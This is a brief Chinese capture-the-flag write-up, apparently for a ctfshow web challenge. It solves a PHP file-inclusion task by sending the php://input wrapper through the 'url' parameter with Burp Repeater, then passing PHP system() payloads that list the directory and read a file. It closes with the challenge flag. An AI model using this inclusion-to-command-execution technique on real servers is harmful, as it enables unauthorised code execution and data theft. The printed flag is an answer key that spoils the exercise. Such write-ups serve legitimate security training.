提示是一道php伪协议+文件包含的题目,通过get传递的参数是 url
使用 Burp 抓包,发送给 Repeater
构造php伪协议,通过url传递
?url=php://input<?php system("pwd");?>查看当前目录
<?php system("ls");?>查看目录内容
<?php system("cat ctf_go_go_go"); ?>查看文件内容,发现了 flag
ctfshow{e84288ac-46ab-4a92-bb8c-5d228d256efd}
